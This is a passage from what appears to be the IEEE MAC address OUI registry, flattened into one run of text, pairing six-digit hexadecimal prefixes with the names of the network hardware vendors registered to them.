Nurivoice Co., Ltd CC4085 WiZ DCCD18 Nintendo Co.,Ltd C851FB Extreme Networks, Inc. C8154E Intel Corporate 4C496C Intel Corporate 0018AD NIDEC INSTRUMENTS CORPORATION A4CCB3 Xiaomi Communications Co Ltd EC5382 Honor Device Co., Ltd. 9C0971 New H3C Technologies Co., Ltd E40D3B Ericsson AB 98D3D7 HUAWEI TECHNOLOGIES CO.,LTD 886EEB HUAWEI TECHNOLOGIES CO.,LTD 98AB15 Fujian Youyike Technology Co.,Ltd A025D7 Aruba, a Hewlett Packard Enterprise Company DCEB69 Vantiva USA LLC 946A77 Vantiva USA LLC D4B92F Vantiva USA LLC 589630 Vantiva USA LLC 9064AD HUAWEI TECHNOLOGIES CO.,LTD D4D892 HUAWEI TECHNOLOGIES CO.,LTD 603D26 Vantiva USA LLC 54A65C Vantiva USA LLC B42A0E Vantiva USA LLC C42795 Vantiva USA LLC E0885D Vantiva USA LLC 802994 Vantiva USA LLC 48C461 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD B8B7DB GOIP Global Services Pvt. Ltd. B83DF6 Texas Instruments B4DDE0 Shanghai Amphenol Airwave Communication Electronics Co.,Ltd. E0DBD1 Vantiva USA LLC ECA81F Vantiva USA LLC 48BDCE Vantiva USA LLC 9404E3 Vantiva USA LLC 989D5D Vantiva USA LLC 484BD4 Vantiva USA LLC 880CE0 Texas Instruments 6CA367 Avlinkpro 888187 Umeox Innovations Co.,Ltd 6C6E07 CE LINK LIMITED 988F00 Aruba, a Hewlett Packard Enterprise Company B8FC28 Valeo Vision Systems D40F9E Apple, Inc. 980DAF Apple, Inc. DC6DBC Apple, Inc. 64E4A5 LG Electronics A4D23E Apple, Inc. 30E04F Apple, Inc. 50482C IEEE Registration Authority 0020FC Matrox Central Services Inc 6C6286 Nokia 602B58 EM Microelectronic 109D9C EM Microelectronic 28FF5F HG Genuine Intelligent Terminal (Xiaogan) Co.,Ltd. 607623 Shenzhen E-Superlink Technology Co., Ltd 78DF72 Shanghai Imilab Technology Co.Ltd 7492BA Movesense Ltd 0CAE5F Silicon Laboratories 2C459A Dixon Technologies (India) Limited D0484F Nokia Solutions and Networks GmbH & Co. KG 18A788 Shenzhen MEK Intellisys Pte Ltd 74C530 vivo Mobile Communication Co., Ltd. A899AD Chaoyue Technology Co., Ltd. BC8529 Jiangxi Remote lntelligence Technology Co.,Ltd 64CE6E Sierra Wireless, ULC 84DB2F Sierra Wireless, ULC D015BB IEEE Registration Authority 64DAED eero inc. BC96E5 SERCOMM PHILIPPINES INC 289401 NETGEAR D878C9 SERVERCOM (INDIA) PRIVATE LIMITED A85EF2 TECNO MOBILE LIMITED 789A18 Routerboard.com 989F1E HUAWEI TECHNOLOGIES CO.,LTD 944788 HUAWEI TECHNOLOGIES CO.,LTD 5412CB HUAWEI TECHNOLOGIES CO.,LTD 98FBF5 ATRALTECH 74D7CA Panasonic Automotive Systems Co.,Ltd 00181C VITEC 90395F Amazon Technologies Inc. 301D49 Firmus Technologies Pty Ltd 401482 Cisco Systems, Inc 800794 Samsung Electronics Co.,Ltd F43C3B HUNAN FN-LINK TECHNOLOGY LIMITED 743357 vivo Mobile Communication Co., Ltd. 6828CF Aruba, a Hewlett Packard Enterprise Company 8CEEFD zte corporation C04943 zte corporation 58CDC9 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. B0FB15 Laird Connectivity AC00F9 BizLink Technology (S.E.A) Sdn. Bhd. BCF499 Rockwell Automation 903C1D HISENSE VISUAL TECHNOLOGY CO.,LTD 681A7C Sichuan Tianyi Comheart Telecom Co.,LTD D4B680 Shanghai Linkyum Microeletronics Co.,Ltd D4E95E Texas Instruments 1015C1 Zhanzuo (Beijing) Technology Co., Ltd. 8CF3E7 solidotech 90EB50 Cisco Systems, Inc 3C2EF5 Silicon Laboratories 609532 Zebra Technologies Inc. 28EF01 Amazon Technologies Inc. D452C7 Beijing L&S Lancom Platform Tech. Co., Ltd. C81337 Juniper Networks AC416A Amazon Technologies Inc. 246C84 Cisco Systems, Inc C068CC Shenzhen Skyworth Digital Technology CO., Ltd 24E8E5 Shenzhen Skyworth Digital Technology CO., Ltd 04AB08 Shenzhen Skyworth Digital Technology CO., Ltd E8D52B Google, Inc. CC3ADF Neptune Technology Group Inc. 68EC8A IKEA of Sweden AB 8488E1 Apple, Inc. 10BD3A Apple, Inc. 184A53 Apple, Inc. 109F41 Apple, Inc. 7072FE Apple, Inc. 90A7BF EM Microelectronic 80EE25 Shenzhen Skyworth Digital Technology CO., Ltd 1055E4 Shenzhen Skyworth Digital Technology CO., Ltd 04CE09 Shenzhen Skyworth Digital Technology CO., Ltd 40679B Shenzhen Skyworth Digital Technology CO., Ltd 2CC253 Apple, Inc. 6885A4 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 7430AF Fiberhome Telecommunication Technologies Co.,LTD 28BEF3 FUJIAN STAR-NET COMMUNICATION CO.,LTD E0CB19 Nokia 848F69 Dell Inc. 549F35 Dell Inc. B456FA IOPSYS Software Solutions 80C45D IPG Laser GmbH 68F63B Amazon Technologies Inc. E8F8D0 Nokia Shanghai Bell Co., Ltd. 408E2C Microsoft Corporation 845A3E Cisco Systems, Inc B0216F HUAWEI TECHNOLOGIES CO.,LTD 94DF34 HUAWEI TECHNOLOGIES CO.,LTD 111111 Private D4BED9 Dell Inc. ECF4BB Dell Inc. B8CA3A Dell Inc. 000D56 Dell Inc. 94988F Sagemcom Broadband SAS F07B65 Sagemcom Broadband SAS 40FAFE Motorola Mobility LLC, a Lenovo Company 201C3A Nintendo Co.,Ltd 249038 Universal Biosensors Pty Ltd F8EDAE MOBIWIRE MOBILES(NINGBO) CO.,LTD 00E60E Extreme Networks, Inc. 14C35E FibRSol Global Network Limited A44CC8 Dell Inc. E4F004 Dell Inc. 20040F Dell Inc. F40270 Dell Inc. 3448ED Dell Inc. 70B5E8 Dell Inc. B8CB29 Dell Inc. 34735A Dell Inc. C025A5 Dell Inc. 8CEC4B Dell Inc. 544810 Dell Inc. A89969 Dell Inc. E8B5D0 Dell Inc. 089204 Dell Inc. B82A72 Dell Inc. BC305B Dell Inc. 0023AE Dell Inc. 001D09 Dell Inc. 880894 Skullcandy 902AEE Xiaomi Communications Co Ltd D8478F Microchip Technology Inc. 988CB3 Sichuan Tianyi Comheart Telecom Co.,LTD D87A3B Silicon Laboratories A8C56F GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD AC7A94 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 04DA28 Chongqing Zhouhai Intelligent Technology Co., Ltd 4891D5 Cisco Systems, Inc D8E35E LG Innotek 786829 eero inc. 14A417 Shenzhen Belon Technology CO.,LTD 60489C YIPPEE ELECTRONICS CO.,LIMITED 3C0CDB UNION MAN TECHNOLOGY CO.,LTD F4D9C6 UNION MAN TECHNOLOGY CO.,LTD 20F597 Maasiv, LLC 5C2167 Rockwell Automation 489ECB Hewlett Packard Enterprise 0C014B zte corporation 74D6E5 Huawei Device Co., Ltd. 34AFA3 Recogni Inc 6C0370 Extreme Networks, Inc. E01FFC Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. CC4740 AzureWave Technology Inc. 2029B9 Ikotek technology SH Co., Ltd 001491 Daniels Electronics Ltd. dba Codan Radio Communications 200BC5 Cisco Systems, Inc 90E95E Cisco Systems, Inc 2857BE Hangzhou Hikvision Digital Technology Co.,Ltd. 1868CB Hangzhou Hikvision Digital Technology Co.,Ltd. DC9EAB Chongqing Yipingfang Technology Co., Ltd. 6C8F4E Chongqing Yipingfang Technology Co., Ltd. 040312 Hangzhou Hikvision Digital Technology Co.,Ltd. 304F75 DZS Inc. D096FB DZS Inc. 000147 DZS Inc. 000271 DZS Inc. 9C65FA AcSiP 882508 Meta Platforms Technologies, LLC C82B6B shenzhen worldelite electronics co., LTD 1814AE Nokia BCBAC2 Hangzhou Hikvision Digital Technology Co.,Ltd. ACCB51 Hangzhou Hikvision Digital Technology Co.,Ltd. 5850ED Hangzhou Hikvision Digital Technology Co.,Ltd. 1012FB Hangzhou Hikvision Digital Technology Co.,Ltd. 4CF5DC Hangzhou Hikvision Digital Technology Co.,Ltd. 988B0A Hangzhou Hikvision Digital Technology Co.,Ltd. 807C62 Hangzhou Hikvision Digital Technology Co.,Ltd. BC9B5E Hangzhou Hikvision Digital Technology Co.,Ltd. 80BEAF Hangzhou Hikvision Digital Technology Co.,Ltd. C4678B Alphabet Capital Sdn Bhd 60F04D Honor Device Co., Ltd. 5C628B TP-Link Corporation Limited D43A2F SHENZHEN MTC CO LTD 14ABEC Aruba, a Hewlett Packard Enterprise Company 9C84B6 Shenzhen iComm Semiconductor CO.,LTD 34CA81 New H3C Intelligence Terminal Co., Ltd. 280C2D QUALVISION TECHNOLOGY CO.,LTD 8867DC HUAWEI TECHNOLOGIES CO.,LTD 40410D HUAWEI TECHNOLOGIES CO.,LTD 5C8B6B Amazon Technologies Inc. D021F9 Ubiquiti Inc 70A741 Ubiquiti Inc 4881D4 Ruijie Networks Co.,LTD 60030C Shenzhen YOUHUA Technology Co., Ltd C0613D BioIntelliSense, Inc. 0418D6 Ubiquiti Inc 24A43C Ubiquiti Inc 44D9E7 Ubiquiti Inc 307C5E Juniper Networks F01C2D Juniper Networks 64649B Juniper Networks 009069 Juniper Networks 80ACAC Juniper Networks 0C8610 Juniper Networks 544B8C Juniper Networks 2C2131 Juniper Networks 9CCC83 Juniper Networks 44AA50 Juniper Networks E8B6C2 Juniper Networks 0019E2 Juniper Networks 002688 Juniper Networks 841888 Juniper Networks B0A86E Juniper Networks 0881F4 Juniper Networks 000E51 TECNA SpA C0C70A Ruckus Wireless 001616 BROWAN COMMUNICATIONS INCORPORATION CCD81F Maipu Communication Technology Co.,Ltd. E0D8C4 Qingdao Intelligent&Precise Electronics Co.,Ltd. 5C9462 Shenzhen Jiuzhou Electric Co.,LTD BC9E2C China Mobile Group Device Co.,Ltd. 545DD9 EDISTEC 404CCA Espressif Inc. D4996C Juniper Networks E4BCAA Xiaomi Communications Co Ltd C409B7 Juniper Networks 74E798 Juniper Networks 487310 Juniper Networks 14B3A1 Juniper Networks E4FC82 Juniper Networks B8C253 Juniper Networks 045C6C Juniper Networks 40DEAD Juniper Networks 0C599C Juniper Networks 9CD1D0 Guangzhou Ronsuo Electronic Technology Co.,Ltd 3C792B Dongguan Auklink TechnologyCo.,Ltd 38141B Secure Letter Inc. B461E9 Sichuan AI-Link Technology Co., Ltd. 64E204 NTN Technical Service Corporation 2C9811 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 90D689 Huahao Fangzhou Technology Co.,Ltd C08B2A Cisco Systems, Inc 2CCA75 Robert Bosch GmbH AnP 88C6E8 HUAWEI TECHNOLOGIES CO.,LTD 707CE3 HUAWEI TECHNOLOGIES CO.,LTD 3C6F9B zte corporation 9052BF Sichuan Tianyi Comheart Telecom Co.,LTD 28022E Apple, Inc. FC9CA7 Apple, Inc. 48E15C Apple, Inc. 7415F5 Apple, Inc. 48A98A Routerboard.com E88843 Xiaomi Communications Co Ltd 881E59 Onion Corporation 2C002A Shenzhen TINNO Mobile Technology Corp. 60EFAB Silicon Laboratories ACFC82 Shenzhen Sundray Technologies Company Limited 705A6F IEEE Registration Authority DCA313 Shenzhen Changjin Communication Technology Co.,Ltd 70B651 Eight Sleep 043201 Broadcom Limited 7C1779 EM Microelectronic 386F6B GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 541149 vivo Mobile Communication Co., Ltd. 00187F ZODIANET CCF826 Samsung Electronics Co.,Ltd 182654 Samsung Electronics Co.,Ltd 1C6760 Phonesuite 5451DE Cisco Systems, Inc B4BC7C Texas Instruments F88A5E Texas Instruments 90CEB8 Texas Instruments 689A21 Fiberhome Telecommunication Technologies Co.,LTD 38396C Huawei Device Co., Ltd. 5066E5 Huawei Device Co., Ltd. DC7794 Huawei Device Co., Ltd. D8341C GD Midea Air-Conditioning Equipment Co.,Ltd. AC81F3 Nokia Corporation 606E41 Barrot Technology Co.,LTD 88948E Max Weishaupt GmbH DCB347 SHENZHEN FAST TECHNOLOGIES CO.,LTD F4331C Toast, Inc. B04B68 NAKAYO Inc F86B14 Barrot Technology Co.,LTD 90AB96 Silicon Laboratories 704698 HUAWEI TECHNOLOGIES CO.,LTD 78084D HUAWEI TECHNOLOGIES CO.,LTD 2C1809 Apple, Inc. FC47D8 Apple, Inc. ECAA8F HUAWEI TECHNOLOGIES CO.,LTD 44EB2E ALPSALPINE CO,.LTD 047F0E Barrot Technology Co.,LTD 4C0617 Taicang T&W Electronics D49AF6 AzureWave Technology Inc. E49D73 Edgecore Networks Corporation D40145 ATW TECHNOLOGY, INC. 7C646C LG Electronics 7896A3 Extreme Networks, Inc. 48C1EE Honor Device Co., Ltd. 60292B TP-LINK TECHNOLOGIES CO.,LTD. 5C64F3 sywinkey HongKong Co,. Limited? 28E424 New H3C Technologies Co., Ltd A8F8C9 NXP Semiconductor (Tianjin) LTD. 94720F Guangdong Nanguang Photo&Video Systems Co., Ltd. 646876 Edifier International FC3FA6 eero inc. A024F9 Chengdu InnovaTest Technology Co., Ltd E0B98A Shenzhen Taike industrial automation company,Ltd 704777 Ruckus Wireless 00068F Telemonitor, Inc. 040067 Stanley Black & Decker 50804A Quectel Wireless Solutions Co.,Ltd. A486AE Quectel Wireless Solutions Co.,Ltd. 58D391 Quectel Wireless Solutions Co.,Ltd. 0024AC Hangzhou DPtech Technologies Co., Ltd. 601521 Redarc Electronics E426D5 Motorola Mobility LLC, a Lenovo Company CC087B HUAWEI TECHNOLOGIES CO.,LTD 7830F5 TBT Inc. 88AF7B Nanjing Powercore Tech Co.,Ltd 8C8E0D zte corporation 9C8824 PetroCloud LLC 54D7E3 Aruba, a Hewlett Packard Enterprise Company E04B41 Hangzhou Beilian Low Carbon Technology Co., Ltd. A8EE6D Fine Point-High Export 200C86 GX India Pvt Ltd 88B86F Infinix mobility limited 280AEE Renesas Electronics (Penang) Sdn. Bhd. 70AED5 Apple, Inc. C47B80 Protempis, LLC 00090F Fortinet, Inc. 000CE6 Fortinet, Inc. 846082 Hyperloop Technologies, Inc dba Virgin Hyperloop F04F7C Amazon Technologies Inc. F0A225 Amazon Technologies Inc. D43A2C Google, Inc. 4C22F3 Arcadyan Corporation 5C2FAF HomeWizard B.V. 385319 34ED LLC DBA Centegix 54C6FF New H3C Technologies Co., Ltd F4E975 New H3C Technologies Co., Ltd D4D4DA Espressif Inc. C4E5B1 Suzhou PanKore Integrated Circuit Technology Co. Ltd. ACC4A9 Fiberhome Telecommunication Technologies Co.,LTD 7C949F Shenzhen iComm Semiconductor CO.,LTD 3C2CA6 Beijing Xiaomi Electronics Co.,Ltd 34F223 Fujian Newland Communication Science Technology Co.,Ltd. E8EF22 Siemens Numerical Control Ltd., Nanjing 786C84 Amazon Technologies Inc. 94BE09 China Mobile Group Device Co.,Ltd. E07526 China Dragon Technology Limited 1461A4 Honor Device Co., Ltd. 94D86B nass magnet Hungária Kft. 38A9EA HK DAPU ELECTRONIC TECHNOLOGY CO., LIMITED 24E50F Google, Inc. C091B9 Amazon Technologies Inc. 386407 Qingdao Intelligent&Precise Electronics Co.,Ltd. 1C63A5 securityplatform 4C74A7 IEEE Registration Authority B8D4BC zte corporation C4EB43 Sagemcom Broadband SAS C4EB41 Sagemcom Broadband SAS 743E39 YUSUR Technology Co., Ltd. D09686 IEEE Registration Authority E8AACB Samsung Electronics Co.,Ltd 54102E HUAWEI TECHNOLOGIES CO.,LTD 94D54D HUAWEI TECHNOLOGIES CO.,LTD C4AAC4 Zhejiang Dahua Technology Co., Ltd. E48E10 CIG SHANGHAI CO LTD 64DBF7 Nokia Shanghai Bell Co., Ltd. 3CA2C3 vivo Mobile Communication Co., Ltd. BCD0EB New H3C Technologies Co., Ltd 605801 Shandong ZTop Microelectronics Co., Ltd. D8630D Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 9C635B zte corporation D4BABA IEEE Registration Authority F8075D Huawei Device Co., Ltd. 98226E Amazon Technologies Inc. F89B6E Nokia Solutions and Networks GmbH & Co. KG F8A4FB Nanjing Decowell Automation Co.,LTD 9CD8E3 Wuhan Huazhong Numerical Control Co., Ltd 14DC51 Xiamen Cheerzing IOT Technology Co.,Ltd. 04331F Huawei Device Co., Ltd. 702804 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 5C475E Ring LLC E0C264 Intel Corporate 24DC0F Phytium Technology Co.,Ltd. 684992 Cisco Meraki 60C7BE Realme Chongqing Mobile Telecommunications Corp.,Ltd. 0404B8 China Hualu Panasonic AVC Networks Co., LTD. 40C2BA COMPAL INFORMATION (KUNSHAN) CO., LTD. F082C0 Silicon Laboratories 18D6DD HUAWEI TECHNOLOGIES CO.,LTD FC1803 HUAWEI TECHNOLOGIES CO.,LTD 68962E HUAWEI TECHNOLOGIES CO.,LTD CC3DD1 HUAWEI TECHNOLOGIES CO.,LTD 54C45B Arcadyan Corporation 80BC37 Ruckus Wireless 24F0D3 Samsung Electronics Co.,Ltd 582071 Samsung Electronics Co.,Ltd E001A6 Edgecore Networks Corporation C0515C zte corporation 203626 TP-Link Corporation Limited 7C2F80 Gigaset Communications GmbH 30B0EA Shenzhen Chuangxin Internet Communication Technology Co., Ltd 7CDCCC BEIJING STARBLAZE TECHNOLOGY CO.,LTD B08101 Honor Device Co., Ltd. 485DED Sichuan Tianyi Comheart Telecom Co.,LTD 5CFC6E Sichuan Tianyi Comheart Telecom Co.,LTD A41CB4 DFI Inc 401A58 Wistron Neweb Corporation 005CC2 SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 7C50DA E.J Ward 2CF2A5 Sagemcom Broadband SAS 4CFC22 SHANGHAI HI-TECH CONTROL SYSTEM CO.,LTD. E4ECE8 Samsung Electronics Co.,Ltd CC5EF8 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. A49E69 Silicon Laboratories 3C0268 Infinera, Inc. 7408DE Fujian Landi Commercial Technology Co., Ltd. 10FC33 Huawei Device Co., Ltd. 943C96 Sagemcom Broadband SAS C8908A Samsung Electronics Co.,Ltd 403306 Taicang T&W Electronics 000BF8 Infinera, Inc. 783EA1 Nokia Shanghai Bell Co., Ltd. 34479A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 70B7E4 Broadcom Limited 1423F2 Broadcom Limited BC89A7 Apple, Inc. 94AD23 Apple, Inc. 20A5CB Apple, Inc. F421CA Apple, Inc. 709C45 HUAWEI TECHNOLOGIES CO.,LTD FC1263 ASKEY COMPUTER CORP 58305B Shanghai Junqian Sensing Technology Co.,LTD 5C0758 Ufispace Co., LTD. A03131 Procenne Digital Security C071AA ShenZhen OnMicro Electronics Co.,Ltd. FC0736 Huawei Device Co., Ltd. 94A07D Huawei Device Co., Ltd. 6883CB Apple, Inc. 68B9C2 Earda Technologies co Ltd DCB7AC Aruba, a Hewlett Packard Enterprise Company 142D79 Fiberhome Telecommunication Technologies Co.,LTD DCE650 Extreme Networks, Inc. 84F44C International Integrated Systems., Inc. ECC07A Laird Connectivity C81EC2 ITEL MOBILE LIMITED 9C0591 Mellanox Technologies, Inc. 589A3E Amazon Technologies Inc. E838A0 Vizio, Inc 88B863 HISENSE VISUAL TECHNOLOGY CO.,LTD 1C46D1 SKY UK LIMITED 003F10 Shenzhen GainStrong Technology Co., Ltd. 8822B2 Chipsea Technologies (Shenzhen) Corp. 4802AF Telit Communication s.p.a FCC737 Shaanxi Gangsion Electronic Technology Co., Ltd 94286F zte corporation 400EF3 zte corporation 9401AC Wuhan Qianyang Iotian Technology Co., Ltd 5431D4 TGW Mechanics GmbH E016B1 Advanced Design Technology co.,ltd. AC606F Nokia Shanghai Bell Co., Ltd. D8E844 zte corporation E46A35 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 2004F3 Honor Device Co., Ltd. 38E7C0 Hui Zhou Gaoshengda Technology Co.,LTD F0C1CE GoodWe Technologies CO., Ltd 906AEB Microsoft Corporation C4EB39 Sagemcom Broadband SAS 0052C8 Made Studio Design Ltd. 6865B7 Zhishang Chuanglian Technology Co., Ltd 743AF4 Intel Corporate 687A64 Intel Corporate BC0358 Intel Corporate B4466B REALTIMEID AS 2C93FB Sercomm France Sarl 7844FD TP-LINK TECHNOLOGIES CO.,LTD. C06911 Arista Networks 582B0A Texas Instruments 089DF4 Intel Corporate DC4628 Intel Corporate 0C9192 Intel Corporate 48AD9A Intel Corporate 58C57E Fiberhome Telecommunication Technologies Co.,LTD 3C0B4F Yandex Services AG 4C312D Sichuan AI-Link Technology Co., Ltd. C04E30 Espressif Inc. AC15A2 TP-Link Corporation Limited ACDF9F Arcadyan Corporation E4B555 Huawei Device Co., Ltd. 2877B1 Tri plus grupa d.o.o. 405EF6 Samsung Electronics Co.,Ltd 945244 Samsung Electronics Co.,Ltd 9C2E7A Samsung Electronics Co.,Ltd 7C6305 Amazon Technologies Inc. D4E22F Roku, Inc B8B409 Samsung Electronics Co.,Ltd 2418C0 E. Wehrle GmbH 0021D0 Global Display Solutions Spa D87E6F CASCINATION AG 044F7A China Mobile Group Device Co.,Ltd. C43CB0 SHENZHEN BILIAN ELECTRONIC CO.,LTD 34CF6C Hangzhou Taili wireless communication equipment Co.,Ltd 402230 Shenzhen SuperElectron Technology Co.,Ltd. 145BB9 ConMet C82496 Jiangsu Yinhe Electronics Co.,Ltd. B859C8 70mai Co.,Ltd. A8E207 GOIP Global Services Pvt. Ltd. E0F678 Fiberhome Telecommunication Technologies Co.,LTD 28F7D6 Fiberhome Telecommunication Technologies Co.,LTD 90235B Amazon Technologies Inc. 1CBCEC silex technology, Inc. 90CD1F Quectel Wireless Solutions Co.,Ltd. 241FBD Extreme Networks, Inc. D834EE SHURE INCORPORATED 94C5A6 ITEL MOBILE LIMITED F0B661 eero inc. 0425F0 Nokia 4857D2 Broadcom Limited 9C2183 Broadcom Limited 489BE0 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 5CFA25 Sagemcom Broadband SAS F8CDC8 Sichuan Tianyi Comheart Telecom Co.,LTD 64D814 Cisco Systems, Inc 7C11CD QianTang Technology 447F77 Connected Home 48062B Private 749779 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. E06A05 Shenzhen YOUHUA Technology Co., Ltd B0285B JUHUA Technology Inc. 403B7B Huawei Device Co., Ltd. 0830CE Fiberhome Telecommunication Technologies Co.,LTD 14130B Garmin International C0EDE5 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 10A562 Iton Technology Corp. D4A3EB Shenzhen iComm Semiconductor CO.,LTD E0D738 WireStar Networks C8EBEC Shenzhen YOUHUA Technology Co., Ltd 047C16 Micro-Star INTL CO., LTD. 001794 Cisco Systems, Inc F4CE46 Hewlett Packard 7CECB1 Apple, Inc. FCB97E GE Appliances 30E8E4 Qorvo International Pte. Ltd. 48DC9D Grandprint(Beijing) Technology Co., LTD. 64FD96 Sagemcom Broadband SAS 5CE91E Apple, Inc. 88034C WEIFANG GOERTEK ELECTRONICS CO.,LTD 64989E TRINNOV AUDIO BCC746 Hon Hai Precision IND.CO.,LTD 404244 Cisco Systems, Inc 04B6BE CIG SHANGHAI CO LTD 281293 Honor Device Co., Ltd. C0A938 HUAWEI TECHNOLOGIES CO.,LTD 9CBFCD HUAWEI TECHNOLOGIES CO.,LTD B89FCC HUAWEI TECHNOLOGIES CO.,LTD 3425BE Amazon Technologies Inc. 9CE041 Nokia 783486 Nokia 1869D4 Samsung Electronics Co.,Ltd 685E1C Texas Instruments 38AB41 Texas Instruments CC4792 ASIX Electronics Corporation E046EE NETGEAR 5876AC SERNET (SUZHOU) TECHNOLOGIES CORPORATION 0463D0 Huawei Device Co., Ltd. F0D415 Intel Corporate D4D853 Intel Corporate 643172 ZHEJIANG HISING TECHNOLOGY CO.,LTD D0FCD0 HUMAX Co., Ltd. 20FADB Huahao Kunpeng Technology (chengDu) Co.,Ltd. 0C8B95 Espressif Inc. 14448F Edgecore Networks Corporation DCBE49 ITEL MOBILE LIMITED 9C9561 Hui Zhou Gaoshengda Technology Co.,LTD 9C4F5F Google, Inc. A02942 Intel Corporate 1071B3 Zyxel Communications Corporation 8C763F ARRIS Group, Inc. E0036B Samsung Electronics Co.,Ltd 50C1F0 NXP Semiconductor (Tianjin) LTD. F4848D TP-LINK TECHNOLOGIES CO.,LTD. 581122 ASUSTek COMPUTER INC. 74694A Sichuan Tianyi Comheart Telecom Co.,LTD 00B0EE Ajile Systems, Inc. B87EE5 Intelbras 50DCD0 Observint Technologies, Inc. 80691A Belkin International Inc. 78152D UNION CHIP TECHNOLOGY LIMITED 60BEB4 S-Bluetech co., limited 90DF7D Realme Chongqing Mobile Telecommunications Corp.,Ltd. A854A2 Heimgard Technologies AS 30F70D Cisco Systems, Inc 98A92D New H3C Technologies Co., Ltd 0C8629 IEEE Registration Authority D4F0EA Beijing Xiaomi Mobile Software Co., Ltd 94ABFE Nokia BC1D89 Motorola Mobility LLC, a Lenovo Company 742A8A shenzhen worldelite electronics co., LTD 00A554 Intel Corporate 5C24E2 Suzhou Denbom Electronic S&T Co., Ltd E47305 Shenzhen INVT Electric CO.,Ltd B01B4B Invisible Fun Studio Limited A4C337 Apple, Inc. B0F1D8 Apple, Inc. D0880C Apple, Inc. 1C57DC Apple, Inc. 604F5B Huawei Device Co., Ltd. 747446 Google, Inc. 7820A5 Nintendo Co.,Ltd 2078CD Apple, Inc. 30D53E Apple, Inc. 5023A2 Apple, Inc. 98698A Apple, Inc. 78FBD8 Apple, Inc. A069D9 New H3C Technologies Co., Ltd 20FE00 Amazon Technologies Inc. F421AE Shanghai Xiaodu Technology Limited B4B742 Amazon Technologies Inc. 78A03F Amazon Technologies Inc. F412FA Espressif Inc. B0F208 AVM Audiovisuelles Marketing und Computersysteme GmbH F0B2B9 Intel Corporate DC99FE Armatura LLC 9CF155 Nokia 5046AE MERCURY CORPORATION B099D7 Samsung Electronics Co.,Ltd 487412 OnePlus Technology (Shenzhen) Co., Ltd 14DCE2 THALES AVS France 985F4F Tongfang Computer Co.,Ltd. 34F86E Parker Hannifin Corporation 0CAEBD Edifier International 90F260 Shenzhen Honesty Electronics Co.,Ltd. 1889CF TECNO MOBILE LIMITED 24813B Cisco Systems, Inc 0CB8E8 Renesas Electronics (Penang) Sdn. Bhd. E8F375 Nokia E831CD Espressif Inc. A8E621 Amazon Technologies Inc. 381EC7 Chipsea Technologies(Shenzhen) Corp. F0A654 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 6CD869 Guangzhou Sat Infrared Co.,LTD 3CCFB4 Telink Semiconductor (Shanghai) Co., Ltd. 043CE8 Shenzhen SuperElectron Technology Co.,Ltd. EC5C84 Murata Manufacturing Co., Ltd. C0886D Securosys SA E8EECC Fantasia Trading LLC 04BD97 Cisco Systems, Inc 541651 Ruijie Networks Co.,LTD 60BC4C EWM Hightec Welding GmbH 0C2369 Honeywell SPS AC0425 ball-b GmbH Co KG C89BD7 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 28B133 SHINEMAN(SHENZHEN) Tech. Cor., Ltd. 209BE6 Guangzhou Shiyuan Electronic Technology Company Limited 7087A7 Murata Manufacturing Co., Ltd. 4CE0DB Xiaomi Communications Co Ltd 7C33F9 HUAWEI TECHNOLOGIES CO.,LTD A08069 Intel Corporate A81710 Bouffalo Lab (Nanjing) Co., Ltd. 74E6B8 LG Electronics 28D0F5 Ruijie Networks Co.,LTD 941865 NETGEAR A8587C Shoogee GmbH & Co. KG 4076A9 Huawei Device Co., Ltd. F438C1 Huawei Device Co., Ltd. 28EA2D Apple, Inc. B8E60C Apple, Inc. 48352B Apple, Inc. 4CE6C0 Apple, Inc. 3888A4 Apple, Inc. 44DA30 Apple, Inc. 84160C Broadcom Limited 38F7F1 Huawei Device Co., Ltd. D004B0 Samsung Electronics Co.,Ltd 98B08B Samsung Electronics Co.,Ltd 9C2595 Samsung Electronics Co.,Ltd 086AE5 Amazon Technologies Inc. A06720 China Dragon Technology Limited 94C9B7 IEEE Registration Authority 2072A9 Beijing Xiaomi Electronics Co.,Ltd 8CB094 Airtech I&C Co., Ltd EC6488 Honor Device Co., Ltd. 98BEDC Honor Device Co., Ltd. E42761 Honor Device Co., Ltd. A06974 Honor Device Co., Ltd. 1C869A Samsung Electronics Co.,Ltd 70A8D3 Intel Corporate D8FBD6 Amazon Technologies Inc. 9C47F9 LJU Automatisierungstechnik GmbH 206296 Shenzhen Malio Technology Co.,Ltd 2C3358 Intel Corporate D0622C Xi'an Yipu Telecom Technology Co.,Ltd. E05689 Lootom Telcovideo Network (Wuxi) Co Ltd 00064D Sencore A02BB8 Hewlett Packard E06CF6 ESSENCORE limited 78C62B FUJIAN STAR-NET COMMUNICATION CO.,LTD D46624 Cisco Systems, Inc 5058B0 Hunan Greatwall Computer System Co., Ltd. D07880 Fiberhome Telecommunication Technologies Co.,LTD 14CB65 Microsoft Corporation 7813E0 FUJIAN STAR-NET COMMUNICATION CO.,LTD 4861EE Samsung Electronics Co.,Ltd A84B4D Samsung Electronics Co.,Ltd F4F309 Samsung Electronics Co.,Ltd E8CBED Chipsea Technologies(Shenzhen) Corp. 3408E1 Texas Instruments 18B96E Dongguan Liesheng Electronic Co., Ltd. 64BE63 STORDIS GmbH 3C869A HUAWEI TECHNOLOGIES CO.,LTD 2C2768 HUAWEI TECHNOLOGIES CO.,LTD 546990 HUAWEI TECHNOLOGIES CO.,LTD D80A60 HUAWEI TECHNOLOGIES CO.,LTD 0CC6FD Xiaomi Communications Co Ltd 50DAD6 Xiaomi Communications Co Ltd D4F98D Espressif Inc. 9C9019 Beyless 